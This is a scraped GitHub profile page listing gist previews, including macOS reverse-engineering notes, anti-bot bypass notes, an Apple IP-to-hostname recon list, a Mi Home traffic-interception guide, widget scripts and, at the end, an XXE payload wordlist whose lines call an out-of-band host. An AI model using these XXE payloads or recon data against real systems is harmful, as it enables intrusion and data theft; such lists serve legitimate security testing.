Skip to content

Instantly share code, notes, and snippets.

View duraki's full-sized avatar

duraki

215 followers · 2.3k following
View GitHub Profile
@0xdevalias
0xdevalias / reverse-engineering-macos.md
Last active June 18, 2025 16:04
Some notes, tools, and techniques for reverse engineering macOS binaries
@Sachinart
Sachinart / apple-recon-cidr-asn.txt
Last active May 19, 2025 07:52
Apple Recon data - CIDR & ASN based all IPs scanned | reverse DNS
144.178.16.10 ussjc1-client-vpn15.apple.com.
144.178.16.100 usdal2-corpclient-vpn.apple.com.
144.178.16.101 usdal2-corpclient-vpn11.apple.com.
144.178.16.102 usdal2-corpclient-vpn12.apple.com.
144.178.16.103 usdal2-corpclient-vpn13.apple.com.
144.178.16.104 usdal2-corpclient-vpn14.apple.com.
144.178.16.105 usdal2-corpclient-vpn15.apple.com.
144.178.16.106 usdal2-corpclient-vpn16.apple.com.
144.178.16.11 ussjc1-client-vpn16.apple.com.
144.178.16.12 ussjc1-dcvpnclient-vpn.apple.com.
@0xdevalias
0xdevalias / bypassing-cloudflare-akamai-etc.md
Last active June 11, 2025 14:15
Some notes/resources for bypassing anti-bot/scraping features on Cloudflare, Akamai, etc.
@kconner
kconner / macOS Internals.md
Last active July 2, 2025 14:28
macOS Internals

macOS Internals

Understand your Mac and iPhone more deeply by tracing the evolution of Mac OS X from prelease to Swift. John Siracusa delivers the details.

Starting Points

How to use this gist

You've got two main options:

@joshdholtz
joshdholtz / ATinySampleApp.swift
Last active February 12, 2025 13:48
Super basic SwiftUI app (70 lines of code) with paywall using RevenueCat
import SwiftUI
import RevenueCat
struct Constants {
static let apiKey = "<your_api_key>" // Will look like: appl_bunchofotherstuffhere
static let entitlementName = "<your_entitlement_name>" // I use something like "pro"
}
@main
struct ATinySampleApp: App {
@Alienmario
Alienmario / mi_home_external_automation.md
Last active May 24, 2025 06:47
Mi home external automation (Non rooted, Android 11)
  1. Create a manual scene in Mi Home for the device you'd like to control
  2. Use Http Toolkit to figure out the scene id.
    • Install the app on PC and Android, follow the instructions - install CA certificate and connect
    • Set to only intercept the Mi home app
    • While snooping, start the scene in Mi home, then you can disconnect http toolkit
    • Look for this request: https://de.api.io.mi.com/app/scene/start
    • The request body should look like this (actual values replaced with *) data=*&rc4_hash__=*&signature=*&_nonce=*&ssecurity=*
    • You will need the values for data, nonce and ssecurity. Run each one by https://www.urldecoder.org/.
@mountbatt
mountbatt / ZOE-Widget.js
Last active July 1, 2025 19:55
Scriptable iOS widget that displays the status of your Renault ZOE (or Megane, Dacia Spring) on your iPhone and iPad.
// Variables used by Scriptable.
// These must be at the very top of the file. Do not edit.
// icon-color: light-gray; icon-glyph: car;
// version 2025-06-29
// latest changes:
// not showing invalid charging kW when not available - thanks to dehsgr! <3
// add your my-renault account data:
let myRenaultUser = "your_email" // email
let myRenaultPass = "your_password" // password
@Sillium
Sillium / telekom.js
Last active January 15, 2025 05:41
const apiUrl = "https://pass.telekom.de/api/service/generic/v1/status"
let widget = await createWidget()
widget.backgroundColor = new Color("#777777")
if (!config.runsInWidget) {
await widget.presentSmall()
}
Script.setWidget(widget)
Script.complete()
@ruandre
ruandre / win10-11.md
Last active April 12, 2025 06:09
After installing Windows 10/11

🪟 After installing Windows 10/11

Install

You can use https://uupdump.net/ to build up an ISO file (even from Linux or Mac, the options enable you to keep the file size down) and just drop into https://github.com/ventoy/Ventoy and you're good to go.

If you're already running Windows you can do ⊞ Win, Reset this PC for a more convenient ISO download option.

For keys try https://www.microsoft.com/windows/get-windows-11 or local retail store, otherwise check PC Hardware channels on YouTube as they often have links to discounted keys (obviously check if valid/legit, due diligence, etc.)

@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y